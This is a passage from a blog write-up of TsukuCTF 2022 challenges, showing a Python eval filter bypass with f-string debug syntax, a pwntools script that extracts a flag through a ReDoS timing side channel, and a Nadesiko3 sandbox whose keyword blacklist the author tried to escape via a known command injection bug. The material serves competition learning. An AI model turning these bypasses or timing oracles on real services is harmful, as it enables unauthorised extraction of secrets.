height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 
1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Lucky Number 777</h3>\n<p>This was solved by a teammate, but it’s a syntax-abuse problem I want to note down.</p>\n<p>The following script was provided.</p>\n<p>Several special characters are blacklisted, and the line <code class=\"language-text\">lucky_number == \"flag\" or \"{flag}\" in lucky_number</code> blocks both direct reference to the <code class=\"language-text\">flag</code> variable and expansion via <code class=\"language-text\">{flag}</code>.</p>\n<p>The challenge was to bypass these filters and get <code class=\"language-text\">str(eval(lucky_number))</code> to output the <code class=\"language-text\">flag</code> variable.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> string\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">challenge</span><span class=\"token punctuation\">(</span>lucky_number<span class=\"token punctuation\">:</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    flag <span class=\"token operator\">=</span> <span class=\"token string\">\"TsukuCTF22{THIS_IS_NOT_FLAG}\"</span>  <span class=\"token comment\"># TOP SECRET</span>\n    printable <span class=\"token operator\">=</span> string<span class=\"token punctuation\">.</span>printable\n    <span class=\"token builtin\">filter</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"_[].,*+%: 　|()#\\\\\\t\\r\\v\\f\\n\"</span>  <span class=\"token comment\"># (￣ー￣)</span>\n\n    <span class=\"token keyword\">if</span> <span class=\"token 
keyword\">not</span> <span class=\"token builtin\">all</span><span class=\"token punctuation\">(</span>c <span class=\"token keyword\">in</span> printable <span class=\"token keyword\">for</span> c <span class=\"token keyword\">in</span> lucky_number<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> <span class=\"token string\">\"No Hack!!!\"</span>\n\n    <span class=\"token keyword\">if</span> <span class=\"token builtin\">any</span><span class=\"token punctuation\">(</span>c <span class=\"token keyword\">in</span> <span class=\"token builtin\">filter</span> <span class=\"token keyword\">for</span> c <span class=\"token keyword\">in</span> lucky_number<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> <span class=\"token string\">\"No Hack!!!\"</span>\n\n    <span class=\"token keyword\">if</span> lucky_number <span class=\"token operator\">==</span> <span class=\"token string\">\"flag\"</span> <span class=\"token keyword\">or</span> <span class=\"token string\">\"{flag}\"</span> <span class=\"token keyword\">in</span> lucky_number<span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> <span class=\"token string\">\"No Hack!!!\"</span>\n\n    <span class=\"token keyword\">try</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> <span class=\"token string\">\"your lucky_number is \"</span> <span class=\"token operator\">+</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>lucky_number<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">except</span><span class=\"token punctuation\">:</span>\n        <span class=\"token 
keyword\">return</span> <span class=\"token string\">\"No Hack!!!\"</span></code></pre></div>\n<p>Connecting to the challenge server reveals it’s running Python 3.9.4:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">nc</span> tsukuctf.sechack365.com <span class=\"token number\">7777</span>\n<span class=\"token number\">3.9</span>.4 <span class=\"token punctuation\">(</span>default, Apr <span class=\"token number\">10</span> <span class=\"token number\">2021</span>, <span class=\"token number\">15</span>:31:19<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">[</span>GCC <span class=\"token number\">8.3</span>.0<span class=\"token punctuation\">]</span>\nEnter your lucky number:</code></pre></div>\n<p>The <code class=\"language-text\">eval</code> function itself is powerful, but the filters prevent string concatenation and method calls.</p>\n<p>However, <code class=\"language-text\">{}</code> and <code class=\"language-text\">=</code> are not filtered, so the <code class=\"language-text\">f\"{flag=}\"</code> notation can be used to print the Flag.</p>\n<p>This notation was added in Python 3.8 — a relatively new feature.</p>\n<p>Reference: <a href=\"https://docs.python.org/3/reference/lexical_analysis.html#f-strings\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">2. 
Lexical analysis — Python 3.10.8 documentation</a></p>\n<h3 id=\"soder\" style=\"position:relative;\"><a href=\"#soder\" aria-label=\"soder permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>soder</h3>\n<blockquote>\n<p>I made a validator for the flag, but it always returns the same response.\n<em>The flag format is TsukuCTF22{[0-9a-z_]+}. The problem accepts many requests, but please space them a few seconds apart.</em></p>\n</blockquote>\n<p>The following script is provided:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\">#!/usr/bin/env python3</span>\n<span class=\"token keyword\">import</span> os\n<span class=\"token keyword\">import</span> re\n<span class=\"token keyword\">from</span> timeout_decorator <span class=\"token keyword\">import</span> timeout\n\nFLAG <span class=\"token operator\">=</span> os<span class=\"token punctuation\">.</span>getenv<span class=\"token punctuation\">(</span><span class=\"token string\">\"FLAG\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"TsukuCTF22{dummy_flag}\"</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token decorator annotation punctuation\">@timeout</span><span class=\"token punctuation\">(</span><span class=\"token number\">5</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">def</span> <span class=\"token function\">flag_validator</span><span class=\"token 
punctuation\">(</span>pattern<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    re<span class=\"token punctuation\">.</span><span class=\"token keyword\">match</span><span class=\"token punctuation\">(</span>pattern<span class=\"token punctuation\">,</span> FLAG<span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">yakitori</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    pattern <span class=\"token operator\">=</span> <span class=\"token builtin\">input</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Pattern: \"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"I check your pattern.\"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">try</span><span class=\"token punctuation\">:</span>\n        <span class=\"token comment\"># This function will be timed out in 5 seconds.</span>\n        flag_validator<span class=\"token punctuation\">(</span>pattern<span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">except</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"error\"</span><span class=\"token punctuation\">)</span>\n\n    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Probably valid flag!\"</span><span class=\"token punctuation\">)</span>\n\nyakitori<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>This script uses the received pattern to validate against the Flag.</p>\n<p>However, the script returns the same response regardless 
of whether validation succeeds or fails.</p>\n<p>There is also a 5-second timeout, but hitting that timeout also produces the same response.</p>\n<p>The key insight is that <code class=\"language-text\">re.match()</code> evaluates the pattern from left to right and stops as soon as the regex matches.</p>\n<p>Therefore, by placing an arbitrary pattern (the guess) at the beginning and an intentionally slow (ReDoS-vulnerable) regex at the end as a fallback alternative, we can use timing as a side channel: a fast response means the pattern at the beginning matched, while a slow response means matching fell through to the slow regex.</p>\n<p>The general approach came to me quickly, but I spent a bit of time on how to deliberately slow down the regex.</p>\n<p>In the end, I intentionally crafted a ReDoS-vulnerable regex to trigger the timeout.</p>\n<p>Reference: <a href=\"http://www.rcc.ritsumei.ac.jp/2021/1220_12435/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Day 20: 3 Rules of Thumb for ReDoS Vulnerability | Ritsumeikan Computer Club</a></p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">Quote:\nThree Rules of Thumb <span class=\"token keyword\">for</span> ReDoS Vulnerability\n\n<span class=\"token number\">1</span>. Nested quantifiers\n   Matching <span class=\"token function\">time</span> grows exponentially. e.g. <span class=\"token punctuation\">(</span>a+<span class=\"token punctuation\">)</span>+b\n\n<span class=\"token number\">2</span>. Repeated pattern that can match both alternatives <span class=\"token keyword\">in</span> a choice\n   Matching <span class=\"token function\">time</span> grows exponentially. e.g. <span class=\"token punctuation\">(</span>a<span class=\"token operator\">|</span><span class=\"token builtin class-name\">.</span><span class=\"token punctuation\">)</span>+b\n\n<span class=\"token number\">3</span>. Concatenated repetition expressions\n   Matching <span class=\"token function\">time</span> grows polynomially. e.g. 
a.+b.+c</code></pre></div>\n<p>The following script was ultimately used to retrieve the Flag:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> time\n<span class=\"token keyword\">import</span> re\n<span class=\"token keyword\">import</span> string\n\n<span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n<span class=\"token keyword\">import</span> binascii\n\npt <span class=\"token operator\">=</span> <span class=\"token string\">r\"|(.+)+a\"</span>\n\nflag <span class=\"token operator\">=</span> <span class=\"token string\">\"TsukuCTF22{\"</span>\nwords <span class=\"token operator\">=</span> <span class=\"token string\">\"abcdefghijklmnopqrstuvwxyz0123456789_\"</span>\n\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">25</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>i<span class=\"token punctuation\">,</span> flag<span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">for</span> w <span class=\"token keyword\">in</span> words<span class=\"token punctuation\">:</span>\n        test <span class=\"token operator\">=</span> flag <span class=\"token operator\">+</span> <span class=\"token string\">r\"[\"</span> <span class=\"token operator\">+</span> w <span class=\"token operator\">+</span> <span class=\"token string\">r\"]{\"</span> <span class=\"token operator\">+</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span 
class=\"token string\">r\"}.{\"</span> <span class=\"token operator\">+</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span><span class=\"token number\">24</span><span class=\"token operator\">-</span>i<span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token string\">r\"}}\"</span>\n\n        p <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"133.130.103.51\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">31417</span><span class=\"token punctuation\">)</span>\n        r <span class=\"token operator\">=</span> p<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n        start <span class=\"token operator\">=</span> time<span class=\"token punctuation\">.</span>time<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n        p<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>test<span class=\"token operator\">+</span>pt<span class=\"token punctuation\">)</span>\n        r <span class=\"token operator\">=</span> p<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n        r <span class=\"token operator\">=</span> p<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n        t <span class=\"token operator\">=</span> time<span class=\"token punctuation\">.</span>time<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">-</span> start\n        p<span class=\"token punctuation\">.</span>close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n        <span class=\"token 
keyword\">if</span> t <span class=\"token operator\">&lt;</span> <span class=\"token number\">1</span><span class=\"token punctuation\">:</span>\n            flag <span class=\"token operator\">+=</span> w\n            <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">break</span>\n        \n        time<span class=\"token punctuation\">.</span>sleep<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h3 id=\"nako3ndbox\" style=\"position:relative;\"><a href=\"#nako3ndbox\" aria-label=\"nako3ndbox permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>nako3ndbox</h3>\n<blockquote>\n<p>Let’s play in Japanese</p>\n</blockquote>\n<p>The server was running the following program written in Nadesiko 3 (なでしこ3):</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">「------------------------------------------------------------\n             _        _____           _ _\n _ __   __ _<span class=\"token operator\">|</span> <span class=\"token operator\">|</span> _____<span class=\"token operator\">|</span>___ / _ __   __<span class=\"token operator\">|</span> <span class=\"token operator\">|</span> <span class=\"token operator\">|</span>__   _____  __\n<span class=\"token operator\">|</span> <span class=\"token string\">'_ \\ / _` | 
|/ / _ \\ |_ \\| '</span>_ <span class=\"token punctuation\">\\</span> / _` <span class=\"token operator\">|</span> '_ <span class=\"token punctuation\">\\</span> / _ <span class=\"token punctuation\">\\</span> <span class=\"token punctuation\">\\</span>/ /\n<span class=\"token operator\">|</span> <span class=\"token operator\">|</span> <span class=\"token operator\">|</span> <span class=\"token operator\">|</span> <span class=\"token punctuation\">(</span>_<span class=\"token operator\">|</span> <span class=\"token operator\">|</span>   <span class=\"token operator\">&lt;</span> <span class=\"token punctuation\">(</span>_<span class=\"token punctuation\">)</span> <span class=\"token operator\">|</span>__<span class=\"token punctuation\">)</span> <span class=\"token operator\">|</span> <span class=\"token operator\">|</span> <span class=\"token operator\">|</span> <span class=\"token operator\">|</span> <span class=\"token punctuation\">(</span>_<span class=\"token operator\">|</span> <span class=\"token operator\">|</span> <span class=\"token operator\">|</span>_<span class=\"token punctuation\">)</span> <span class=\"token operator\">|</span> <span class=\"token punctuation\">(</span>_<span class=\"token punctuation\">)</span> <span class=\"token operator\">></span>  <span class=\"token operator\">&lt;</span>\n<span class=\"token operator\">|</span>_<span class=\"token operator\">|</span> <span class=\"token operator\">|</span>_<span class=\"token operator\">|</span><span class=\"token punctuation\">\\</span>__,_<span class=\"token operator\">|</span>_<span class=\"token operator\">|</span><span class=\"token punctuation\">\\</span>_<span class=\"token punctuation\">\\</span>___/____/<span class=\"token operator\">|</span>_<span class=\"token operator\">|</span> <span class=\"token operator\">|</span>_<span class=\"token operator\">|</span><span class=\"token punctuation\">\\</span>__,_<span class=\"token operator\">|</span>_.__/ <span class=\"token 
punctuation\">\\</span>___/_/<span class=\"token punctuation\">\\</span>_<span class=\"token punctuation\">\\</span>\n\n------------------------------------------------------------」と言う\n\n「日本語コード：」と尋ねる\nそれを入力に代入\n\nブラックリスト＝「読、開、保存、実行、起動、サーバ、フォルダ、ファイル、ナデシコ、ディレクトリ、flag」を「、」で区切る\n\nブラックリスト！＝空の間\n　　ブラックリストの０から１を配列取り出す\n　　もし（入力でそれの出現回数）！＝０ならば\n　　　　「日本語の世界からは出しませんよ！！！」と言う\n　　　　終了する\n　　ここまで\nここまで\n\n「｛入力｝」をナデシコする\n\n終了する</code></pre></div>\n<p>Any input containing a keyword from the “blacklist” is rejected, which blocks direct use of file operations and similar commands.</p>\n<p>The running version of Nadesiko was <code class=\"language-text\">nadesiko3@3.3.67</code>, so I searched GitHub for vulnerability or bug reports and found that this version contains an OS command injection vulnerability.</p>\n<p>Reference: <a href=\"https://github.com/kujirahand/nadesiko3/issues/1325\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Issue with cnako3 compression/decompression · Issue #1325 · kujirahand/nadesiko3</a></p>\n<p>I got excited and tried various exploit permutations to get the Flag, but never succeeded and gave up.</p>\n<p>Part of the issue was my exploit skills, but I was also too fixated on confirming success via console output.</p>\n<p>When the response wasn’t coming back, I assumed it had failed — but apparently it had actually succeeded.</p>\n<p>As the writeup explains, the Flag cannot be retrieved via console output alone; you need to execute a command that transfers the file to a remote host.</p>\n<p>This was the challenge I most wanted to solve, so it stings.</p>\n<h2 id=\"wrap-up\" style=\"position:relative;\"><a href=\"#wrap-up\" aria-label=\"wrap up permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 
9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Wrap-up</h2>\n<p>It was great to get back out competing as 0neP@dding after a while, and we had a lot of fun.</p>\n<p>That said, having just two people felt a bit lonely, so I’m thinking it’s time to recruit more members soon.</p>","fields":{"slug":"/ctf-tsukushi-2022-en","tagSlugs":["/tag/ctf-en/","/tag/osint-en/","/tag/writeup-en/","/tag/english/"]},"frontmatter":{"date":"2022-10-23","description":"TsukuCTF 2022 Writeup","tags":["CTF (en)","OSINT (en)","Writeup (en)","English"],"title":"TsukuCTF 2022 Writeup","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/ctf-tsukushi-2022-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}